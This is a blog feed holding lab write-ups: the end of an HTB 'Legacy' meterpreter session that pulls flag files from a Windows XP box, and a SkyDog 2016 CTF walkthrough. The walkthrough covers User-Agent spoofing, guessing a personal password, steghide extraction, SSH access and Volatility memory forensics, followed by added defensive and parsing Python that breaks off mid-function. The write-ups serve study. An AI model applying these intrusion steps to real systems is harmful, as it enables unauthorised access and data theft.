cd "Documents and Settings"

C:\Documents and Settings&gt;dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\Documents and Settings

16/03/2017 09:07 &lt;DIR&gt; .
16/03/2017 09:07 &lt;DIR&gt; ..
16/03/2017 09:07 &lt;DIR&gt; Administrator
16/03/2017 08:29 &lt;DIR&gt; All Users
16/03/2017 08:33 &lt;DIR&gt; john
0 File(s) 0 bytes
5 Dir(s) 6.488.395.776 bytes free

C:\Documents and Settings&gt;cd john
cd john

C:\Documents and Settings\john&gt;dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\Documents and Settings\john

16/03/2017 08:33 &lt;DIR&gt; .
16/03/2017 08:33 &lt;DIR&gt; ..
16/03/2017 09:19 &lt;DIR&gt; Desktop
16/03/2017 08:33 &lt;DIR&gt; Favorites
16/03/2017 08:33 &lt;DIR&gt; My Documents
16/03/2017 08:20 &lt;DIR&gt; Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.488.395.776 bytes free

C:\Documents and Settings\john&gt;cd Desktop
cd Desktop

C:\Documents and Settings\john\Desktop&gt;dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\Documents and Settings\john\Desktop

16/03/2017 09:19 &lt;DIR&gt; .
16/03/2017 09:19 &lt;DIR&gt; ..
16/03/2017 09:19 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.488.395.776 bytes free

C:\Documents and Settings\john\Desktop&gt;edit user.txt
edit user.txt
^C
Terminate channel 1? [y/N] y
meterpreter &gt; pwd
C:\WINDOWS\system32
meterpreter &gt; cd C:\Documents and Settings\john\Desktop
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
meterpreter &gt; cd C:
meterpreter &gt; pwd
C:\WINDOWS\system32
meterpreter &gt; lpwd
/home/kaipowered/Documents/HTB
meterpreter &gt; cd C:\
meterpreter &gt; pwd
C:\
meterpreter &gt; cd "Documents and Settings"
meterpreter &gt; pwd
C:\Documents and Settings
meterpreter &gt; cd john
meterpreter &gt; cd Desktop
meterpreter &gt; download user.txt
[*] Downloading: user.txt -&gt; user.txt
[*] Downloaded 32.00 B of 32.00 B (100.0%): user.txt -&gt; user.txt
[*] download : user.txt -&gt; user.txt
meterpreter &gt; pwd
C:\Documents and Settings\john\Desktop
meterpreter &gt; cd ..
meterpreter &gt; cd ..
meterpreter &gt; pwd
C:\Documents and Settings
meterpreter &gt; dir
Listing: C:\Documents and Settings
==================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-16 14:07:21 +0800 Administrator
40777/rwxrwxrwx 0 dir 2017-03-16 13:29:48 +0800 All Users
40777/rwxrwxrwx 0 dir 2017-03-16 13:33:37 +0800 Default User
40777/rwxrwxrwx 0 dir 2017-03-16 13:32:52 +0800 LocalService
40777/rwxrwxrwx 0 dir 2017-03-16 13:32:43 +0800 NetworkService
40777/rwxrwxrwx 0 dir 2017-03-16 13:33:42 +0800 john

meterpreter &gt; cd Administrator
meterpreter &gt; dir
Listing: C:\Documents and Settings\Administrator
================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:29 +0800 Application Data
40777/rwxrwxrwx 0 dir 2017-03-16 13:32:27 +0800 Cookies
40777/rwxrwxrwx 0 dir 2017-03-16 14:18:27 +0800 Desktop
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:32 +0800 Favorites
40777/rwxrwxrwx 0 dir 2017-03-16 13:20:48 +0800 Local Settings
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:31 +0800 My Documents
100666/rw-rw-rw- 524288 fil 2017-05-11 06:31:16 +0800 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2017-07-24 00:18:53 +0800 NTUSER.DAT.LOG
40777/rwxrwxrwx 0 dir 2017-03-16 13:20:48 +0800 NetHood
40777/rwxrwxrwx 0 dir 2017-03-16 13:20:48 +0800 PrintHood
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:31 +0800 Recent
40555/r-xr-xr-x 0 dir 2017-03-16 14:07:24 +0800 SendTo
40555/r-xr-xr-x 0 dir 2017-03-16 13:20:48 +0800 Start Menu
40777/rwxrwxrwx 0 dir 2017-03-16 13:28:41 +0800 Templates
100666/rw-rw-rw- 178 fil 2017-05-11 06:31:16 +0800 ntuser.ini

meterpreter &gt; cd Desktop
meterpreter &gt; dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 32 fil 2017-03-16 14:18:50 +0800 root.txt

meterpreter &gt; download root.txt
[*] Downloading: root.txt -&gt; root.txt
[*] Downloaded 32.00 B of 32.00 B (100.0%): root.txt -&gt; root.txt
[*] download : root.txt -&gt; root.txt
meterpreter &gt;
</code></pre></div></div>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[This post contains the actual commands that I used in hacking and getting the user and root hashes on HTB Legacy Box. Enumeration kaipowered@debian:~/Downloads/enum4linux-0.8.9/enum4linux-0.8.9$ su…]]></summary></entry><entry><title type="html">Vulnhub SkyDog 2016 – Catch Me If You Can</title><link href="https://blog.anotsodev.me/2017/08/30/vulnhub-sky-dog-2016-catch-me-if-you-can.html" rel="alternate" type="text/html" title="Vulnhub SkyDog 2016 – Catch Me If You Can" /><published>2017-08-30T00:00:00+00:00</published><updated>2017-08-30T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2017/08/30/vulnhub-sky-dog-2016-catch-me-if-you-can</id><content type="html" xml:base="https://blog.anotsodev.me/2017/08/30/vulnhub-sky-dog-2016-catch-me-if-you-can.html"><![CDATA[<p>The SkyDogConCTF is one of the most enjoyable CTF challenges that I have ever played because it contained a lot of twists and challenges that don’t need advanced exploitation techniques and the tools to solve these challenges were available in Kali Linux.</p>

<p>There were also hints on how to get the flags.</p>

<p><em>Flag#1 – “Don’t go Home Frank! There’s a Hex on Your House”</em></p>

<p><em>Flag#2 – “Obscurity or Security? That is the Question”</em></p>

<p><em>Flag#3 – “During his Travels Frank has Been Known to Intercept Traffic”</em></p>

<p><em>Flag#4 – “A Good Agent is Hard to Find”</em></p>

<p><em>Flag#5 – “The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices”</em></p>

<p><em>Flag#6 – “Where in the World is Frank?”</em></p>

<p><em>Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”</em></p>

<p><em>Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”</em></p>

<p>So after running the netdiscover command to get the IP address of the VM, I fired up Nmap to scan the available ports.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -p- -sV -sC -oA nmapscan 192.168.56.102
 Host is up (0.00048s latency).
 Not shown: 65531 filtered ports
 PORT STATE SERVICE VERSION
 22/tcp closed ssh
 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
 |_http-server-header: Apache/2.4.18 (Ubuntu)
 |_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
 |_http-server-header: Apache/2.4.18 (Ubuntu)
 |_http-title: 400 Bad Request
 | ssl-cert: Subject: commonName=Network Solutions EV Server CA 2/organizationName=Network Solutions L.L.C./stateOrProvinceName=VA/countryName=US
 | Not valid before: 2016-09-21T14:51:57
 |_Not valid after: 2017-09-21T14:51:57
 |_ssl-date: TLS randomness does not represent time
 22222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 | 2048 b6:64:7c:d1:55:46:4e:50:e3:ba:cf:4c:1e:81:f9:db (RSA)
 |_ 256 ef:17:df:cc:db:2e:c5:24:e3:9e:25:16:3d:25:68:35 (ECDSA)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Tue Aug 29 13:41:53 2017 -- 1 IP address (1 host up) scanned in 124.99 seconds
</code></pre></div></div>

<p>There were three open ports:</p>

<ul>
  <li>port 80</li>
  <li>port 443</li>
  <li>port 22222</li>
</ul>

<p>The first interesting port that I noticed was port 22222, so I executed the ssh command.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/skydogctf$ ssh 192.168.56.102 -p 22222
 ###############################################################
 # WARNING #
 # FBI - Authorized access only! #
 # Disconnect IMMEDIATELY if you are not an authorized user!!! #
 # All actions Will be monitored and recorded #
 # Flag{53c82eba31f6d416f331de9162ebe997} #
 ###############################################################
 kaipowered@192.168.56.102's password:
</code></pre></div></div>

<p>And there it was. The first flag was shown on the banner message. After getting the first flag, I cracked the given md5 hash here: http://md5online.org/</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Flag{53c82eba31f6d416f331de9162ebe997}

Decoded MD5 Hash: encrypt
</code></pre></div></div>

<p>I had no idea how I could use the word ‘encrypt’ to get the next flag, so the next thing I did was open the web browser and open the website hosted on the VM.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-01-26-55.png?resize=1170%2C586&amp;ssl=1" alt="Screenshot from 2017-08-31 01-26-55" /></p>

<p>And it showed me the homepage of the SkyDogConCTF. I explored the entire website and I only found some interesting and funny testimonials of this CTF challenge.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-01-32-09.png?resize=814%2C516&amp;ssl=1" alt="Screenshot from 2017-08-31 01-32-09" /></p>

<p>So after viewing all the links on the website, I went back to the homepage and viewed the page source of the website.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-01-34-10.png?resize=898%2C680&amp;ssl=1" alt="Screenshot from 2017-08-31 01-34-10" /></p>

<p>Line 40 of the source caught my attention. So I opened the source of the script in the web browser and it showed me this.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-01-36-17.png?resize=648%2C127&amp;ssl=1" alt="Screenshot from 2017-08-31 01-36-17" /></p>

<p>The first line of the JS file appeared to be hex, and the hint for Flag #1 made sense, quoting “Don’t go Home Frank! There’s a Hex on Your House”. So I went to this site http://www.rapidtables.com/convert/number/hex-to-ascii.htm and converted the hex value to ASCII and it showed me the first flag.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>flag{7c0132070a0ef71d542663e9dc1f5dee}

Decoded MD5 Hash: nmap
</code></pre></div></div>

<p>I guessed that the decoded hash was a hint or something, but I had already run an Nmap scan, so the next thing I did was visit the https version of the website and view the information of the certificate.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-01-45-36.png?resize=1170%2C634&amp;ssl=1" alt="Screenshot from 2017-08-31 01-45-36" /></p>

<p>And there it was, the flag#3.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>flag3{f82366a9ddc064585d54e3f78bde3221}

Decoded MD5 Hash: personnel
</code></pre></div></div>

<p>The next hint was “personnel” and my instinct told me that it was a directory of the web server. And I was right.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-01-52-18.png?resize=1170%2C293&amp;ssl=1" alt="Screenshot from 2017-08-31 01-52-18" /></p>

<p>So I checked the hint for the next flag again, Flag #4, which says:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>“A Good Agent is Hard to Find"
</code></pre></div></div>

<p>I could only think of one thing related to the word “Agent” and it was the “User-Agent”. But I had no idea what User-Agent I should use to open the “personnel” directory, so after reading the “ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging….” message, I opened the html5.js file again and searched for “FBI”. And there, I found two interesting lines in the JS file.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* maindev - 6/7/02 Adding temporary support for IE4 FBI Workstations */
 /* newmaindev - 5/22/16 Last maindev was and idoit and IE4 is still Gold image -@Support doug.perterson@fbi.gov */
</code></pre></div></div>

<p>I searched for the User-Agent of the IE4 and changed my User-Agent to access the “personnel” directory.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Mozilla/4.0 (compatible; MSIE 4.0; Windows 98)
</code></pre></div></div>

<p>And I got access to the “personnel” directory.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-02-10-57.png?resize=1170%2C591&amp;ssl=1" alt="Screenshot from 2017-08-31 02-10-57" /></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>flag{14e10d570047667f904261e6d08f520f}

Clue = new+flag

Decoded MD5 Hash: evidence

Clue = newevidence
</code></pre></div></div>

<p>So I got the 4th flag and got the clue on how to get the next flag.</p>

<p>And it appeared that I needed to enter the username and password before I can view the content of the newevidence directory.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-02-12-54.png?resize=1170%2C583&amp;ssl=1" alt="Screenshot from 2017-08-31 02-12-54" /></p>

<p>The first thing I did was to search “Agent Hanratty” on Google to see any available information about Agent Hanratty that could be used as a username.</p>

<p>So I found that the first name of Agent Hanratty is Carl and the last name is Hanratty.</p>

<p>Going back to the html5.js file, I noticed that the format of the username was firstname.lastname.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>doug.perterson@fbi.gov
</code></pre></div></div>

<p>So the username of Agent Hanratty is</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>carl.hanratty
</code></pre></div></div>

<p>I only needed the password to access the newevidence directory and based on the Flag #5 quote</p>

<p><em>The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or <strong>Personal</strong> it Goes Against Best Practices</em></p>

<p>So I searched for a person who was very close to Agent Hanratty or a member of his family, and after searching and trying all the possible passwords, I tried the name “Grace” as the password, which I found in this phrase.</p>

<p><em>Workaholic Carl Hanratty loses his daughter <strong>Grace</strong> to a divorce.</em></p>

<p>And I got access to the newevidence directory.</p>
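<p>Two of the flags above make the same point from opposite sides: the “personnel” directory was gated on a User-Agent string, which anyone who reads the JS comment can send (“Obscurity or Security?”), and the directory behind it was protected by a password that was a family member’s name (“Simple, Guessable, or Personal”). As an added example that is not part of the writeup or the CTF, here is the User-Agent check beside a real authentication check, plus the kind of registration-time password rule that would have refused “Grace”. The header dictionaries, the <code>users</code> store and the PBKDF2 parameters are all constructed for the example.</p>

```python
import hashlib
import hmac
import os

# Constructed stand-ins for the request headers a web server would see.
SPOOFED_IE4 = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 4.0; Windows 98)"}
FIREFOX = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0"}


def ua_gate(headers):
    """The obscurity control: trust a client-supplied header. Any client can
    send any User-Agent, so this authorises nobody in particular."""
    return "MSIE 4.0" in headers.get("User-Agent", "")


# --- hardened: authenticate the user, never the client string -----------------

def make_record(password, salt=None, rounds=100_000):
    """Store a salted PBKDF2-SHA256 hash of the password (hypothetical user store)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return {"salt": salt, "rounds": rounds, "digest": digest}


def verify(record, password):
    cand = hashlib.pbkdf2_hmac("sha256", password.encode(), record["salt"], record["rounds"])
    # constant-time comparison so a wrong guess cannot be timed byte by byte
    return hmac.compare_digest(cand, record["digest"])


# Used when the username does not exist, so that an unknown user costs the
# same time as a wrong password and usernames cannot be enumerated by timing.
DUMMY = make_record("dummy-not-a-real-password")


def auth_gate(headers, users, credentials):
    """Grant access only on a valid (username, password); the headers argument
    is accepted and deliberately ignored so the User-Agent plays no part."""
    if credentials is None:
        return False
    user, password = credentials
    record = users.get(user)
    if record is None:
        verify(DUMMY, password)
        return False
    return verify(record, password)


def password_acceptable(password, personal_terms, min_len=12):
    """Registration-time rule for the Flag #5 lesson: refuse short passwords
    and any password containing a fact about the user (family names, pets,
    employer). personal_terms is whatever the enrolment form already knows."""
    if min_len > len(password):
        return False
    low = password.lower()
    for term in personal_terms:
        if term.lower() in low:
            return False
    return True
```

<p>The difference in one sentence: <code>ua_gate</code> asks the client what it is, while <code>auth_gate</code> asks the client to prove who it is. The dummy verification on an unknown username is the small extra that keeps the login from leaking which usernames exist.</p>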

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-31-02-30-10.png?resize=1170%2C599&amp;ssl=1" alt="Screenshot from 2017-08-31 02-30-10" /></p>

<p>So I downloaded the “Evidence Summary File” and the content of the file was this.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>flag{117c240d49f54096413dd64280399ea9}

Decoded MD5 Hash: panam
</code></pre></div></div>

<p>It appeared that it was the Flag #5 and the decoded md5 hash was “panam”.</p>

<p>I tried opening “panam” on the web browser hoping that it was also a directory of the web server but there was no “panam” directory on the web server.</p>

<p>There were still two links on the page that I haven’t checked yet. So I clicked the “Possible Location” and there was an image file that can be downloaded, so I downloaded the image file.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot_from_2017_m2krw.jpg?resize=969%2C648&amp;ssl=1" alt="screenshot_from_2017_m2kRw" /></p>

<p>I tried steghide on the image to see if there were any secret messages embedded in the image file.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/skydogctf$ steghide --extract -sf image.jpg
Enter passphrase: panam # I tried the passphrase panam that I got from the decoded md5 hash of flag #5
the file "flag.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "flag.txt"
</code></pre></div></div>

<p>And I guess I was right: there was a text file named “flag”. I viewed the content of the text file and it showed me this.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/skydogctf$ cat flag.txt
flag{d1e5146b171928731385eb7ea38c37b8}
=ILoveFrance

clue=iheartbrenda
kaipowered@debian:~/Documents/Vulnhub/skydogctf$
</code></pre></div></div>

<p>There was the flag #6, the decoded md5 hash, and a clue for the next flag. So going back to the hint for the next flag.</p>

<p><em>Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”</em></p>

<p>The quote “I’m the Fastest Man Alive!” sounded familiar, so the next thing I did was google the quote to find out who said it.</p>

<p><em>My name is Barry Allen, and I am the fastest man alive.</em></p>

<p>It seemed that Barry Allen from The Flash also said “I’m the Fastest Man Alive!”.</p>

<p>The only thing left to check was the SSH service on port 22222.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>username: barryallen

password: iheartbrenda
</code></pre></div></div>

<p>With the username and password I had found, I used SSH to log in to the VM.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/skydogctf$ ssh barryallen@192.168.56.102 -p 22222
###############################################################
# WARNING #
# FBI - Authorized access only! #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
# All actions Will be monitored and recorded #
# Flag{53c82eba31f6d416f331de9162ebe997} #
###############################################################
barryallen@192.168.56.102's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-38-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

14 packages can be updated.
7 updates are security updates.

Last login: Tue Aug 29 07:19:16 2017 from 192.168.56.1

barryallen@skydogconctf2016:~$
</code></pre></div></div>

<p>Commands</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>barryallen@skydogconctf2016:~$ ls
flag.txt security-system.data
</code></pre></div></div>

<p>There were two files present in the home directory of barryallen.</p>

<ul>
  <li>flag.txt</li>
  <li>security-system.data</li>
</ul>

<p>The flag #7 and a zip file.</p>

<p>Here are the commands showing how I got Flag #8, and thanks to this walkthrough, http://evilcsec.com/skydogcon-ctf-catch-me-if-you-can-walkthrough/, for the final flag. I needed to read that walkthrough to learn which tools to use to analyze the data file and get the final flag.</p>

<p>Hint for the final flag.</p>

<p><em>Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”</em></p>

<p>Commands</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>barryallen@skydogconctf2016:~$ cat flag.txt
flag{bd2f6a1d5242c962a05619c56fa47ba6} #decoded md5 hash: theflash
barryallen@skydogconctf2016:~$

barryallen@skydogconctf2016:~$ file security-system.data
security-system.data: Zip archive data, at least v2.0 to extract

barryallen@skydogconctf2016:~$ unzip security-system.data
Archive: security-system.data
replace security-system.data? [y]es, [n]o, [A]ll, [N]one, [r]ename: r
new name: data
inflating: data

barryallen@skydogconctf2016:~$ ls
data flag.txt security-system.data
</code></pre></div></div>

<h4 id="copied-the-extracted-file-from-barryallen-to-local-machine">Copied the extracted file from barryallen to local machine</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/skydogctf$ scp -P 22222 barryallen@192.168.56.102:/home/barryallen/data ~/Documents/Vulnhub/skydogctf
###############################################################
# WARNING #
# FBI - Authorized access only! #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
# All actions Will be monitored and recorded #
# Flag{53c82eba31f6d416f331de9162ebe997} #
###############################################################
barryallen@192.168.56.102's password:
data 100% 1024MB 40.1MB/s 00:25
kaipowered@debian:~/Documents/Vulnhub/skydogctf$

kaipowered@debian:~/Documents/Vulnhub/skydogctf$ volatility imageinfo -f data
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/home/kaipowered/Documents/Vulnhub/skydogctf/tmp/data)
PAE type : PAE
DTB : 0x33e000L
KDBG : 0x80545b60L
Number of Processors : 1
Image Type (Service Pack) : 3
KPCR for CPU 0 : 0xffdff000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2016-10-10 22:00:50 UTC+0000
Image local date and time : 2016-10-10 18:00:50 -0400

kaipowered@debian:~/Documents/Vulnhub/skydogctf$ volatility --profile=WinXPSP2x86 -f data filescan &gt; datafile
Volatility Foundation Volatility Framework 2.6

kaipowered@debian:~/Documents/Vulnhub/skydogctf$ cat datafile | grep flag
kaipowered@debian:~/Documents/Vulnhub/skydogctf$ cat datafile | grep txt
0x0000000005e612f8 1 0 -W-r-- \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt
0x000000000629fc08 1 0 R--rw- \Device\HarddiskVolume1\Program Files\VMware\VMware Tools\vmacthlp.txt
0x00000000062c4620 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\adobephotoshopcs3.txt
0x00000000062c4be8 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\adobeflashcs3.txt
0x00000000062e04b0 1 0 R--r-d \Device\HarddiskVolume1\Documents and Settings\test\Recent\code.txt.lnk
0x00000000063b4428 1 0 R--r-- \Device\HarddiskVolume1\System Volume Information\_restore{FA371F61-4781-4A7F-99F2-B979D68F9988}\drivetable.txt
0x0000000006503e60 4 2 -W-rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware VGAuth\logfile.txt.0
0x000000000663d4c0 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\win7gadgets.txt
0x000000000663d6b8 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\vmwarefilters.txt
0x000000000663d8b0 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\visualstudio2005.txt
0x000000000663daa8 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\vistasidebar.txt
0x000000000663dca0 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\microsoftoffice.txt
0x000000000663de98 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\googledesktop.txt
0x000000000663f970 1 0 R--rwd \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\manifest.txt
0x0000000006640bc8 1 0 R--rwd \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt

kaipowered@debian:~/Documents/Vulnhub/skydogctf$ volatility --profile=WinXPSP2x86 -f data cmdscan
Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: csrss.exe Pid: 560
CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 2 LastAdded: 1 LastDisplayed: 1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x2d4
Cmd #0 @ 0x1024400: cd Desktop
Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d &gt; code.txt
kaipowered@debian:~/Documents/Vulnhub/skydogctf$
</code></pre></div></div>

<p>Convert the hex to ascii.</p>

<p>http://www.rapidtables.com/convert/number/hex-to-ascii.htm</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d
</code></pre></div></div>

<p>Result: flag{841dd3db29b0fbbd89c7b5be768cdc81}</p>

<p>Decoded MD5 Hash: Two little mice</p>
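<p>To script the filescan grep and the cmdscan hex decoding done by hand above, here is an added Python example (my own code, not the author’s and not part of Volatility): it parses Volatility 2 text output, decodes an <code>echo &lt;hex bytes&gt; &gt; file</code> command from the console history, and matches the target file name against the scanned file objects. The two sample output strings are constructed to mirror the lines shown above; the filescan header line is assumed to be what Volatility 2.6 prints.</p>

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of Volatility 2 `filescan` output (paths from the writeup; header lines assumed).
FILESCAN_SAMPLE = r"""
Offset(P)            #Ptr   #Hnd Access Name
------------------ ------ ------ ------ ----
0x0000000005e612f8      1      0 -W-r-- \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt
0x000000000629fc08      1      0 R--rw- \Device\HarddiskVolume1\Program Files\VMware\VMware Tools\vmacthlp.txt
0x00000000062e04b0      1      0 R--r-d \Device\HarddiskVolume1\Documents and Settings\test\Recent\code.txt.lnk
0x0000000006640bc8      1      0 R--rwd \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt
"""

# Constructed sample of `cmdscan` output, mirroring the console history recovered above.
CMDSCAN_SAMPLE = r"""
CommandProcess: csrss.exe Pid: 560
CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 2 LastAdded: 1 LastDisplayed: 1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x2d4
Cmd #0 @ 0x1024400: cd Desktop
Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d > code.txt
"""

FILESCAN_RE = re.compile(r"^(0x[0-9a-fA-F]+)\s+(\d+)\s+(\d+)\s+(\S{6})\s+(.+?)\s*$")
CMD_HDR_RE = re.compile(r"^CommandProcess:\s+(\S+)\s+Pid:\s+(\d+)")
CMD_RE = re.compile(r"^Cmd #(\d+) @ (0x[0-9a-fA-F]+): (.*)$")
# `echo <hex byte pairs> > file` (or `>>`): the pattern used to drop the flag into code.txt.
HEX_ECHO_RE = re.compile(r"^echo\s+((?:[0-9a-fA-F]{2}\s+)*[0-9a-fA-F]{2})\s*>>?\s*(\S+)\s*$")


def parse_filescan(text: str) -> List[Dict[str, object]]:
    """Turn filescan lines into records (offset, ptr, hnd, access, path); other lines are skipped."""
    records = []
    for line in text.splitlines():
        m = FILESCAN_RE.match(line.strip())
        if m:
            records.append({"offset": int(m.group(1), 16), "ptr": int(m.group(2)),
                            "hnd": int(m.group(3)), "access": m.group(4), "path": m.group(5)})
    return records


def find_files(records: List[Dict[str, object]], pattern: str) -> List[Dict[str, object]]:
    """Case-insensitive regex search over the path, the scripted form of `grep txt` above."""
    rx = re.compile(pattern, re.IGNORECASE)
    return [r for r in records if rx.search(str(r["path"]))]


def parse_cmdscan(text: str) -> List[Dict[str, object]]:
    """Collect each recovered console command with the owning process name and PID."""
    commands, proc, pid = [], None, None
    for line in text.splitlines():
        line = line.strip()
        h = CMD_HDR_RE.match(line)
        if h:
            proc, pid = h.group(1), int(h.group(2))
            continue
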